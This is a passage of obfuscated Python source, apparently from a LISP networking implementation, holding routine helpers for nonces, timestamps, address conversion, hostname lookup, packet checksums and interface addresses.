for OoOOoO0oOo in range ( num ) : OoiIIIiIi1I1i += " "
return ( OoiIIIiIi1I1i )
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
if 29 - 29: O0 . I1Ii111
if 66 - 66: oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - ooOoO0o - IiII
if 70 - 70: I1Ii111 + oO0o
if 93 - 93: I1Ii111 + Ii1I
def lisp_get_ephemeral_port ( ) :
return ( random . randrange ( 32768 , 65535 ) )
if 33 - 33: O0
if 78 - 78: O0 / II111iiii * OoO0O00
if 50 - 50: OoooooooOO - iIii1I11I1II1 + i1IIi % I1Ii111 - iIii1I11I1II1 % O0
if 58 - 58: IiII + iIii1I11I1II1
if 65 - 65: II111iiii - I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 * iII111i + Ii1I
if 79 - 79: ooOoO0o . OoOoOO00 % I1Ii111 - Oo0Ooo
if 69 - 69: ooOoO0o - o0oOOo0O0Ooo . ooOoO0o
def lisp_get_data_nonce ( ) :
return ( random . randint ( 0 , 0xffffff ) )
if 9 - 9: oO0o % i11iIiiIii / Oo0Ooo
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
if 80 - 80: OoO0O00 % iII111i
def lisp_get_control_nonce ( ) :
return ( random . randint ( 0 , ( 2 ** 64 ) - 1 ) )
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
if 70 - 70: I1Ii111 + O0 . oO0o * Ii1I
if 2 - 2: OoooooooOO . OOooOOo . IiII
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
if 24 - 24: o0oOOo0O0Ooo
if 10 - 10: o0oOOo0O0Ooo % Ii1I / OOooOOo
if 28 - 28: OOooOOo % ooOoO0o
def lisp_hex_string ( integer_value ) :
iiIiII11i1 = hex ( integer_value ) [ 2 : : ]
if ( iiIiII11i1 [ - 1 ] == "L" ) : iiIiII11i1 = iiIiII11i1 [ 0 : - 1 ]
return ( iiIiII11i1 )
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
if 46 - 46: IiII + oO0o
def lisp_get_timestamp ( ) :
return ( time . time ( ) )
if 79 - 79: OoooooooOO - IiII * IiII . OoOoOO00
if 100 - 100: II111iiii * I11i % I1IiiI / I1ii11iIi11i
if 90 - 90: I1ii11iIi11i . ooOoO0o . OoOoOO00 . Ii1I
if 4 - 4: Ii1I + OoOoOO00 % I1ii11iIi11i / i11iIiiIii
if 74 - 74: II111iiii . O0 - I1IiiI + IiII % i11iIiiIii % OoOoOO00
if 78 - 78: Ii1I + OoOoOO00 + IiII - IiII . i11iIiiIii / OoO0O00
if 27 - 27: Ii1I - O0 % I11i * I1Ii111 . IiII % iIii1I11I1II1
def lisp_set_timestamp ( seconds ) :
return ( time . time ( ) + seconds )
if 37 - 37: OoooooooOO + O0 - i1IIi % ooOoO0o
if 24 - 24: OoOoOO00
if 94 - 94: i1IIi * i1IIi % II111iiii + OOooOOo
if 28 - 28: I1IiiI
if 49 - 49: I11i . o0oOOo0O0Ooo % oO0o / Ii1I
if 95 - 95: O0 * OoOoOO00 * IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
def lisp_print_elapsed ( ts ) :
if ( ts == 0 or ts == None ) : return ( "never" )
Ii1i1 = time . time ( ) - ts
Ii1i1 = round ( Ii1i1 , 0 )
return ( str ( datetime . timedelta ( seconds = Ii1i1 ) ) )
if 65 - 65: oO0o + I1ii11iIi11i / OOooOOo
if 85 - 85: iIii1I11I1II1 / OoooooooOO % II111iiii
if 49 - 49: i11iIiiIii % OoOoOO00 + I1Ii111 . II111iiii % iII111i * OOooOOo
if 67 - 67: i1IIi
if 5 - 5: II111iiii . OoooooooOO
if 57 - 57: I1IiiI
if 35 - 35: OoooooooOO - I1Ii111 / OoO0O00
def lisp_print_future ( ts ) :
if ( ts == 0 ) : return ( "never" )
iii11i1 = ts - time . time ( )
if ( iii11i1 < 0 ) : return ( "expired" )
iii11i1 = round ( iii11i1 , 0 )
return ( str ( datetime . timedelta ( seconds = iii11i1 ) ) )
if 48 - 48: ooOoO0o * I1ii11iIi11i
if 15 - 15: OoO0O00 * I11i % iIii1I11I1II1 * I1ii11iIi11i
if 31 - 31: OoO0O00 * O0 . oO0o
if 59 - 59: II111iiii * i11iIiiIii
if 54 - 54: O0 % OoooooooOO - I1IiiI
if 61 - 61: Oo0Ooo * IiII . Oo0Ooo + Oo0Ooo / IiII * O0
if 73 - 73: iII111i * iII111i / ooOoO0o
if 43 - 43: I1ii11iIi11i . i1IIi . IiII + O0 * Ii1I * O0
if 41 - 41: I1ii11iIi11i + Ii1I % OoooooooOO . I1ii11iIi11i + iII111i . iII111i
if 31 - 31: i11iIiiIii + II111iiii . iII111i * OoOoOO00
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
if 6 - 6: iIii1I11I1II1 * OoooooooOO
def lisp_print_eid_tuple ( eid , group ) :
iIiI1I1ii1I1 = eid . print_prefix ( )
if ( group . is_null ( ) ) : return ( iIiI1I1ii1I1 )
if 83 - 83: OOooOOo / O0 % iII111i - o0oOOo0O0Ooo . Oo0Ooo
iiiii1I1III1 = group . print_prefix ( )
i1oO00O = group . instance_id
if 77 - 77: i11iIiiIii % i1IIi % IiII
if ( eid . is_null ( ) or eid . is_exact_match ( group ) ) :
OOOooo0OooOoO = iiiii1I1III1 . find ( "]" ) + 1
return ( "[{}](*, {})" . format ( i1oO00O , iiiii1I1III1 [ OOOooo0OooOoO : : ] ) )
if 15 - 15: iIii1I11I1II1 . O0
if 70 - 70: Ii1I . i11iIiiIii % Ii1I . O0 - iIii1I11I1II1
i111i1iIi1 = eid . print_sg ( group )
return ( i111i1iIi1 )
if 95 - 95: OoooooooOO + I11i - I1ii11iIi11i / I1ii11iIi11i . i1IIi . OoooooooOO
if 29 - 29: ooOoO0o - i1IIi . I11i - I1ii11iIi11i + ooOoO0o + OoooooooOO
if 36 - 36: i1IIi / ooOoO0o . iIii1I11I1II1
if 12 - 12: Ii1I
if 71 - 71: I1IiiI . II111iiii . I1IiiI - ooOoO0o
if 45 - 45: IiII / O0 / OoOoOO00 * OOooOOo
if 18 - 18: iIii1I11I1II1 + OOooOOo + iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
def lisp_convert_6to4 ( addr_str ) :
if ( addr_str . find ( "::ffff:" ) == - 1 ) : return ( addr_str )
oOOOo0o = addr_str . split ( ":" )
return ( oOOOo0o [ - 1 ] )
if 26 - 26: iIii1I11I1II1 - O0 . O0
if 68 - 68: OOooOOo + oO0o . O0 . Ii1I % i1IIi % OOooOOo
if 50 - 50: IiII + o0oOOo0O0Ooo
if 96 - 96: OoO0O00
if 92 - 92: Oo0Ooo / i11iIiiIii + I1ii11iIi11i
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
def lisp_convert_4to6 ( addr_str ) :
oOOOo0o = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
if ( oOOOo0o . is_ipv4_string ( addr_str ) ) : addr_str = "::ffff:" + addr_str
oOOOo0o . store_address ( addr_str )
return ( oOOOo0o )
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
if 84 - 84: i1IIi
if 42 - 42: II111iiii - OoO0O00 - OoooooooOO . iII111i / OoOoOO00
def lisp_gethostbyname ( string ) :
ooooo0Oo0 = string . split ( "." )
o0I1IIIi11ii11 = string . split ( ":" )
O0o0oo0oOO0oO = string . split ( "-" )
if 15 - 15: OoO0O00 * II111iiii
if ( len ( ooooo0Oo0 ) == 4 ) :
if ( ooooo0Oo0 [ 0 ] . isdigit ( ) and ooooo0Oo0 [ 1 ] . isdigit ( ) and ooooo0Oo0 [ 2 ] . isdigit ( ) and
ooooo0Oo0 [ 3 ] . isdigit ( ) ) : return ( string )
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
if ( len ( o0I1IIIi11ii11 ) > 1 ) :
try :
int ( o0I1IIIi11ii11 [ 0 ] , 16 )
return ( string )
except :
pass
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
if 79 - 79: I1IiiI - ooOoO0o
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
if ( len ( O0o0oo0oOO0oO ) == 3 ) :
for OoOOoO0oOo in range ( 3 ) :
try : int ( O0o0oo0oOO0oO [ OoOOoO0oOo ] , 16 )
except : break
if 52 - 52: Ii1I % OOooOOo * I1IiiI % I11i + OOooOOo / iII111i
if 80 - 80: OoooooooOO + IiII
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
try :
oOOOo0o = socket . gethostbyname ( string )
return ( oOOOo0o )
except :
if ( lisp_is_alpine ( ) == False ) : return ( "" )
if 43 - 43: Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
try :
oOOOo0o = socket . getaddrinfo ( string , 0 ) [ 0 ]
if ( oOOOo0o [ 3 ] != string ) : return ( "" )
oOOOo0o = oOOOo0o [ 4 ] [ 0 ]
except :
oOOOo0o = ""
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
return ( oOOOo0o )
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
if 59 - 59: I1Ii111 - IiII
if 14 - 14: iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
if 49 - 49: IiII * O0 . IiII
def lisp_ip_checksum ( data , hdrlen = 20 ) :
if ( len ( data ) < hdrlen ) :
lprint ( "IPv4 packet too short, length {}" . format ( len ( data ) ) )
return ( data )
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
o0OO00oo0O = binascii . hexlify ( data )
if 46 - 46: i11iIiiIii - OOooOOo * I1IiiI * I11i % I1ii11iIi11i * i1IIi
if 5 - 5: O0 / ooOoO0o . Oo0Ooo + OoooooooOO
if 97 - 97: IiII . Ii1I . Ii1I / iIii1I11I1II1 - OoO0O00 + iII111i
if 32 - 32: OOooOOo . o0oOOo0O0Ooo % IiII + I1ii11iIi11i + OoO0O00
OOOoOOo0o = 0
for OoOOoO0oOo in range ( 0 , hdrlen * 2 , 4 ) :
OOOoOOo0o += int ( o0OO00oo0O [ OoOOoO0oOo : OoOOoO0oOo + 4 ] , 16 )
if 50 - 50: II111iiii - I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1
if 91 - 91: II111iiii - O0 . iIii1I11I1II1 . O0 + I1ii11iIi11i - II111iiii
if 26 - 26: o0oOOo0O0Ooo
if 12 - 12: OoooooooOO / O0 + II111iiii * I1ii11iIi11i
if 46 - 46: II111iiii - IiII * OoooooooOO / oO0o % IiII
OOOoOOo0o = ( OOOoOOo0o >> 16 ) + ( OOOoOOo0o & 0xffff )
OOOoOOo0o += OOOoOOo0o >> 16
OOOoOOo0o = socket . htons ( ~ OOOoOOo0o & 0xffff )
if 11 - 11: iIii1I11I1II1 . OoOoOO00 / IiII % ooOoO0o
if 61 - 61: ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
OOOoOOo0o = struct . pack ( "H" , OOOoOOo0o )
o0OO00oo0O = data [ 0 : 10 ] + OOOoOOo0o + data [ 12 : : ]
return ( o0OO00oo0O )
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
def lisp_icmp_checksum ( data ) :
if ( len ( data ) < 36 ) :
lprint ( "ICMP packet too short, length {}" . format ( len ( data ) ) )
return ( data )
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
O0OO0ooO00 = binascii . hexlify ( data )
if 83 - 83: iIii1I11I1II1
if 63 - 63: OoooooooOO * OoO0O00 / I11i - oO0o . iIii1I11I1II1 + iII111i
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
OOOoOOo0o = 0
for OoOOoO0oOo in range ( 0 , 36 , 4 ) :
OOOoOOo0o += int ( O0OO0ooO00 [ OoOOoO0oOo : OoOOoO0oOo + 4 ] , 16 )
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
OOOoOOo0o = ( OOOoOOo0o >> 16 ) + ( OOOoOOo0o & 0xffff )
OOOoOOo0o += OOOoOOo0o >> 16
OOOoOOo0o = socket . htons ( ~ OOOoOOo0o & 0xffff )
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
if 78 - 78: iIii1I11I1II1 * Oo0Ooo . Oo0Ooo - OOooOOo . iIii1I11I1II1
if 30 - 30: ooOoO0o + ooOoO0o % IiII - o0oOOo0O0Ooo - I1ii11iIi11i
OOOoOOo0o = struct . pack ( "H" , OOOoOOo0o )
O0OO0ooO00 = data [ 0 : 2 ] + OOOoOOo0o + data [ 4 : : ]
return ( O0OO0ooO00 )
if 36 - 36: I11i % OOooOOo
if 72 - 72: I1IiiI / iII111i - O0 + I11i
if 83 - 83: O0
if 89 - 89: Oo0Ooo + I1ii11iIi11i - o0oOOo0O0Ooo
if 40 - 40: OoO0O00 + OoO0O00
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 100 - 100: Ii1I + iIii1I11I1II1
if 59 - 59: IiII
if 89 - 89: OoOoOO00 % iIii1I11I1II1
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
if 6 - 6: OoOoOO00 / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
if 79 - 79: IiII % OoO0O00
if 81 - 81: i11iIiiIii + i11iIiiIii * OoO0O00 + IiII
if 32 - 32: O0 . OoooooooOO
if 15 - 15: I1IiiI . OoO0O00
if 17 - 17: i11iIiiIii / Oo0Ooo . OoO0O00 / I1IiiI
if 38 - 38: i1IIi . I1ii11iIi11i % Ii1I + iIii1I11I1II1 + O0
if 47 - 47: OoO0O00 + IiII / II111iiii
if 97 - 97: I1ii11iIi11i / I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
if 94 - 94: iII111i - Oo0Ooo + oO0o
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
def lisp_udp_checksum ( source , dest , data ) :
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
if 6 - 6: ooOoO0o + OOooOOo / Oo0Ooo + IiII % II111iiii / OoO0O00
I1iiIi111I = lisp_address ( LISP_AFI_IPV6 , source , LISP_IPV6_HOST_MASK_LEN , 0 )
iiIi = lisp_address ( LISP_AFI_IPV6 , dest , LISP_IPV6_HOST_MASK_LEN , 0 )
OooooOo = socket . htonl ( len ( data ) )
IIIiiiIiI = socket . htonl ( LISP_UDP_PROTOCOL )
OO0OOoooo0o = I1iiIi111I . pack_address ( )
OO0OOoooo0o += iiIi . pack_address ( )
OO0OOoooo0o += struct . pack ( "II" , OooooOo , IIIiiiIiI )
if 13 - 13: I1IiiI + O0 - I1ii11iIi11i % Oo0Ooo / Ii1I . i1IIi
if 60 - 60: Oo0Ooo . IiII % I1IiiI - I1Ii111
if 79 - 79: OoooooooOO / I1ii11iIi11i . O0
if 79 - 79: oO0o - II111iiii
Ii1iiI1 = binascii . hexlify ( OO0OOoooo0o + data )
o0ooOOoO0oO0 = len ( Ii1iiI1 ) % 4
for OoOOoO0oOo in range ( 0 , o0ooOOoO0oO0 ) : Ii1iiI1 += "0"
if 86 - 86: i1IIi / Ii1I * I1IiiI
if 67 - 67: I1ii11iIi11i * I1ii11iIi11i / oO0o * OoooooooOO + OoOoOO00
if 79 - 79: i1IIi
if 1 - 1: oO0o / i1IIi
OOOoOOo0o = 0
for OoOOoO0oOo in range ( 0 , len ( Ii1iiI1 ) , 4 ) :
OOOoOOo0o += int ( Ii1iiI1 [ OoOOoO0oOo : OoOOoO0oOo + 4 ] , 16 )
if 74 - 74: I11i / OoooooooOO / Oo0Ooo * i11iIiiIii . II111iiii . OoooooooOO
if 59 - 59: i11iIiiIii . OoooooooOO / I11i * I1ii11iIi11i + OoooooooOO
if 3 - 3: i11iIiiIii * Oo0Ooo % iIii1I11I1II1 % I1IiiI * iII111i / OOooOOo
if 95 - 95: IiII * O0 * I1Ii111 . OoooooooOO % Oo0Ooo + I1ii11iIi11i
if 98 - 98: oO0o . OoooooooOO
OOOoOOo0o = ( OOOoOOo0o >> 16 ) + ( OOOoOOo0o & 0xffff )
OOOoOOo0o += OOOoOOo0o >> 16
OOOoOOo0o = socket . htons ( ~ OOOoOOo0o & 0xffff )
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
if 33 - 33: I11i % II111iiii + OoO0O00
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
OOOoOOo0o = struct . pack ( "H" , OOOoOOo0o )
Ii1iiI1 = data [ 0 : 6 ] + OOOoOOo0o + data [ 8 : : ]
return ( Ii1iiI1 )
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
if 48 - 48: iIii1I11I1II1 % i1IIi + OoOoOO00 % o0oOOo0O0Ooo
if 79 - 79: OoOoOO00 % I1IiiI % Ii1I / i1IIi % OoO0O00
if 56 - 56: iIii1I11I1II1 - i11iIiiIii * iII111i
def lisp_igmp_checksum ( igmp ) :
o0O0Ooo = binascii . hexlify ( igmp )
if 79 - 79: ooOoO0o . oO0o / oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
OOOoOOo0o = 0
for OoOOoO0oOo in range ( 0 , 24 , 4 ) :
OOOoOOo0o += int ( o0O0Ooo [ OoOOoO0oOo : OoOOoO0oOo + 4 ] , 16 )
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
OOOoOOo0o = ( OOOoOOo0o >> 16 ) + ( OOOoOOo0o & 0xffff )
OOOoOOo0o += OOOoOOo0o >> 16
OOOoOOo0o = socket . htons ( ~ OOOoOOo0o & 0xffff )
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
if 30 - 30: I11i % OoOoOO00 / I1ii11iIi11i * O0 * Ii1I . I1IiiI
if 46 - 46: OoOoOO00 - O0
OOOoOOo0o = struct . pack ( "H" , OOOoOOo0o )
igmp = igmp [ 0 : 2 ] + OOOoOOo0o + igmp [ 4 : : ]
return ( igmp )
if 70 - 70: I11i + Oo0Ooo * iIii1I11I1II1 . I1IiiI * I11i
if 49 - 49: o0oOOo0O0Ooo
if 25 - 25: iII111i . OoooooooOO * iIii1I11I1II1 . o0oOOo0O0Ooo / O0 + Ii1I
if 68 - 68: Oo0Ooo
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
def lisp_get_interface_address ( device ) :
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if 94 - 94: i1IIi
if 36 - 36: I1IiiI + Oo0Ooo
if 46 - 46: iII111i
if ( device not in netifaces . interfaces ( ) ) : return ( None )
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
O00Oo = netifaces . ifaddresses ( device )
if ( netifaces . AF_INET not in O00Oo ) : return ( None )
if 38 - 38: i1IIi . i11iIiiIii
if 93 - 93: I11i * II111iiii / Ii1I - o0oOOo0O0Ooo
if 98 - 98: i11iIiiIii / I1IiiI * o0oOOo0O0Ooo / I1Ii111
if 67 - 67: I11i % oO0o
ii1iiIi = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 21 - 21: I1ii11iIi11i
for oOOOo0o in O00Oo [ netifaces . AF_INET ] :
Oo0o = oOOOo0o [ "addr" ]
ii1iiIi . store_address ( Oo0o )
return ( ii1iiIi )
if 73 - 73: i1IIi / II111iiii
return ( None )
if 45 - 45: Ii1I / ooOoO0o . OoooooooOO + OoO0O00
if 51 - 51: iII111i % i11iIiiIii % IiII + I1Ii111 % I1ii11iIi11i
if 16 - 16: OoOoOO00 / Oo0Ooo + O0 - OoOoOO00 . OoooooooOO
if 19 - 19: o0oOOo0O0Ooo
if 73 - 73: I1Ii111 * Oo0Ooo * OoOoOO00
if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
if 2 - 2: I1Ii111 - I1ii11iIi11i + o0oOOo0O0Ooo * OoO0O00 / iII111i
if 26 - 26: OOooOOo * Oo0Ooo
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
def lisp_get_input_interface ( packet ) :
o00oo = lisp_format_packet ( packet [ 0 : 12 ] )
O0oO0oo0O = o00oo . replace ( " " , "" )
oo = O0oO0oo0O [ 0 : 12 ]
oOOO0ooOoOOO = O0oO0oo0O [ 12 : : ]
if 68 - 68: O0
try : o0oOoO00 = ( oOOO0ooOoOOO in lisp_mymacs )
except : o0oOoO00 = False
if 94 - 94: OoO0O00 + IiII + ooOoO0o
if ( oo in lisp_mymacs ) : return ( lisp_mymacs [ oo ] , oOOO0ooOoOOO , oo , o0oOoO00 )
if ( o0oOoO00 ) : return ( lisp_mymacs [ oOOO0ooOoOOO ] , oOOO0ooOoOOO , oo , o0oOoO00 )
return ( [ "?" ] , oOOO0ooOoOOO , oo , o0oOoO00 )
if 82 - 82: Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + IiII % iIii1I11I1II1
if 61 - 61: OOooOOo / Oo0Ooo % OOooOOo - OoO0O00 + ooOoO0o / ooOoO0o
if 82 - 82: Oo0Ooo
if 5 - 5: OoO0O00 / OoO0O00 - O0 - I1Ii111 + I1Ii111
if 99 - 99: I11i * OoooooooOO / o0oOOo0O0Ooo . IiII - iIii1I11I1II1 - Ii1I
if 31 - 31: IiII - OoO0O00 / OOooOOo . i1IIi / Ii1I
if 66 - 66: OoO0O00
if 72 - 72: I1Ii111
def lisp_get_local_interfaces ( ) :
for OoO0 in netifaces . interfaces ( ) :
i1i1111I = lisp_interface ( OoO0 )
i1i1111I . add_interface ( )
if 65 - 65: I11i % oO0o + I1ii11iIi11i
return
if 86 - 86: iIii1I11I1II1 / O0 . I1Ii111 % iIii1I11I1II1 % Oo0Ooo
if 86 - 86: i11iIiiIii - o0oOOo0O0Ooo . ooOoO0o * Oo0Ooo / Ii1I % o0oOOo0O0Ooo
if 61 - 61: o0oOOo0O0Ooo + OoOoOO00
if 15 - 15: OoOoOO00 * oO0o + OOooOOo . I11i % I1IiiI - ooOoO0o
if 13 - 13: OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * i1IIi % I11i
if 82 - 82: IiII . OoOoOO00 / ooOoO0o + iII111i - ooOoO0o
if 55 - 55: ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
def lisp_get_loopback_address ( ) :
for oOOOo0o in netifaces . ifaddresses ( "lo" ) [ netifaces . AF_INET ] :
if ( oOOOo0o [ "peer" ] == "127.0.0.1" ) : continue
return ( oOOOo0o [ "peer" ] )
if 29 - 29: IiII / iIii1I11I1II1 + I1ii11iIi11i % iII111i % I11i
return ( None )
if 46 - 46: iIii1I11I1II1
if 70 - 70: i1IIi . I11i
if 74 - 74: I11i
if 58 - 58: iIii1I11I1II1 * OoO0O00 * I1Ii111 * ooOoO0o . OoooooooOO
